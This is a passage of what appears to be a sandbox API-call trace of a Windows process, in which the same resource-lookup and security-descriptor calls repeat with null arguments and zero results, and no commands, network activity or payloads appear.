[0219.871] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.871] FreeResource (hResData=0x0) returned 0 [0219.871] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.871] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.871] LockResource (hResData=0x0) returned 0x0 [0219.872] FreeResource (hResData=0x0) returned 0 [0219.872] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.872] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.872] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.872] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.872] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.872] LockResource (hResData=0x0) returned 0x0 [0219.872] FreeResource (hResData=0x0) returned 0 [0219.872] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.872] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.872] LockResource (hResData=0x0) returned 0x0 [0219.872] FreeResource (hResData=0x0) returned 0 [0219.872] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.872] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.872] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.872] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.872] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.872] LockResource (hResData=0x0) returned 0x0 [0219.872] FreeResource (hResData=0x0) returned 0 [0219.872] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.872] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.872] LockResource (hResData=0x0) returned 0x0 [0219.872] FreeResource (hResData=0x0) returned 0 [0219.872] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.872] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.872] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.872] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.872] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.872] LockResource (hResData=0x0) returned 0x0 [0219.872] FreeResource (hResData=0x0) returned 0 [0219.872] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.872] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.872] LockResource (hResData=0x0) returned 0x0 [0219.872] FreeResource (hResData=0x0) returned 0 [0219.872] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.872] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.872] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.872] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.872] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.872] LockResource (hResData=0x0) returned 0x0 [0219.872] FreeResource (hResData=0x0) returned 0 [0219.889] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.889] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.889] LockResource (hResData=0x0) returned 0x0 [0219.889] FreeResource (hResData=0x0) returned 0 [0219.889] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.889] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.889] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.889] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.889] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.890] LockResource (hResData=0x0) returned 0x0 [0219.890] FreeResource (hResData=0x0) returned 0 [0219.890] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.890] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.890] LockResource (hResData=0x0) returned 0x0 [0219.890] FreeResource (hResData=0x0) returned 0 [0219.890] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.890] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.890] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.890] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.890] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.890] LockResource (hResData=0x0) returned 0x0 [0219.890] FreeResource (hResData=0x0) returned 0 [0219.890] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.890] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.890] LockResource (hResData=0x0) returned 0x0 [0219.890] FreeResource (hResData=0x0) returned 0 [0219.890] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.890] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.890] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.890] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.890] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.890] LockResource (hResData=0x0) returned 0x0 [0219.890] FreeResource (hResData=0x0) returned 0 [0219.890] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.890] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.890] LockResource (hResData=0x0) returned 0x0 [0219.890] FreeResource (hResData=0x0) returned 0 [0219.890] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.890] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.890] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.890] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.890] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.890] LockResource (hResData=0x0) returned 0x0 [0219.890] FreeResource (hResData=0x0) returned 0 [0219.890] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.890] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.890] LockResource (hResData=0x0) returned 0x0 [0219.890] FreeResource (hResData=0x0) returned 0 [0219.890] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.890] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.890] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.890] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.890] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.891] LockResource (hResData=0x0) returned 0x0 [0219.891] FreeResource (hResData=0x0) returned 0 [0219.891] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.891] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.891] LockResource (hResData=0x0) returned 0x0 [0219.891] FreeResource (hResData=0x0) returned 0 [0219.891] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.891] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.891] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.891] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.891] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.891] LockResource (hResData=0x0) returned 0x0 [0219.891] FreeResource (hResData=0x0) returned 0 [0219.891] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.891] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.891] LockResource (hResData=0x0) returned 0x0 [0219.891] FreeResource (hResData=0x0) returned 0 [0219.891] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.891] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.891] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.891] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.891] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.891] LockResource (hResData=0x0) returned 0x0 [0219.892] FreeResource (hResData=0x0) returned 0 [0219.892] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.892] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.892] LockResource (hResData=0x0) returned 0x0 [0219.892] FreeResource (hResData=0x0) returned 0 [0219.892] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.892] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.892] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.892] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.892] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.892] LockResource (hResData=0x0) returned 0x0 [0219.892] FreeResource (hResData=0x0) returned 0 [0219.892] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.892] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.892] LockResource (hResData=0x0) returned 0x0 [0219.892] FreeResource (hResData=0x0) returned 0 [0219.892] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.892] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.893] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.893] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.893] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.893] LockResource (hResData=0x0) returned 0x0 [0219.893] FreeResource (hResData=0x0) returned 0 [0219.893] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.893] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.893] LockResource (hResData=0x0) returned 0x0 [0219.893] FreeResource (hResData=0x0) returned 0 [0219.893] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.893] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.893] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.893] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.893] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.893] LockResource (hResData=0x0) returned 0x0 [0219.893] FreeResource (hResData=0x0) returned 0 [0219.893] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.893] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.893] LockResource (hResData=0x0) returned 0x0 [0219.893] FreeResource (hResData=0x0) returned 0 [0219.893] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.893] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.893] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.893] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.893] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.893] LockResource (hResData=0x0) returned 0x0 [0219.893] FreeResource (hResData=0x0) returned 0 [0219.893] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.893] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.893] LockResource (hResData=0x0) returned 0x0 [0219.893] FreeResource (hResData=0x0) returned 0 [0219.893] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.893] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.893] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.893] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.893] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.893] LockResource (hResData=0x0) returned 0x0 [0219.893] FreeResource (hResData=0x0) returned 0 [0219.893] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.893] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.893] LockResource (hResData=0x0) returned 0x0 [0219.893] FreeResource (hResData=0x0) returned 0 [0219.893] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.893] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.893] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.894] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.894] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.894] LockResource (hResData=0x0) returned 0x0 [0219.894] FreeResource (hResData=0x0) returned 0 [0219.894] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.894] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.894] LockResource (hResData=0x0) returned 0x0 [0219.894] FreeResource (hResData=0x0) returned 0 [0219.894] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.894] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.894] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.894] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.894] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.894] LockResource (hResData=0x0) returned 0x0 [0219.894] FreeResource (hResData=0x0) returned 0 [0219.894] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.894] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.894] LockResource (hResData=0x0) returned 0x0 [0219.894] FreeResource (hResData=0x0) returned 0 [0219.894] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.894] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.894] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.894] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.895] LockResource (hResData=0x0) returned 0x0 [0219.895] FreeResource (hResData=0x0) returned 0 [0219.895] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.895] LockResource (hResData=0x0) returned 0x0 [0219.895] FreeResource (hResData=0x0) returned 0 [0219.895] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.895] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.895] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.895] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.895] LockResource (hResData=0x0) returned 0x0 [0219.895] FreeResource (hResData=0x0) returned 0 [0219.895] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.895] LockResource (hResData=0x0) returned 0x0 [0219.895] FreeResource (hResData=0x0) returned 0 [0219.895] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.895] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.895] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.895] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.895] LockResource (hResData=0x0) returned 0x0 [0219.895] FreeResource (hResData=0x0) returned 0 [0219.895] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.895] LockResource (hResData=0x0) returned 0x0 [0219.895] FreeResource (hResData=0x0) returned 0 [0219.895] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.895] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.895] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.895] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.895] LockResource (hResData=0x0) returned 0x0 [0219.895] FreeResource (hResData=0x0) returned 0 [0219.895] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.895] LockResource (hResData=0x0) returned 0x0 [0219.895] FreeResource (hResData=0x0) returned 0 [0219.895] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.895] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.895] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.895] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.895] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) returned 0 [0219.896] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.896] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) returned 0 [0219.896] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.896] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.896] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.896] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.896] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) returned 0 [0219.896] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.896] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) returned 0 [0219.896] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.896] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.896] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.896] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.896] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) returned 0 [0219.896] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.896] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) returned 0 [0219.896] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.896] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.896] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.896] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.896] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) 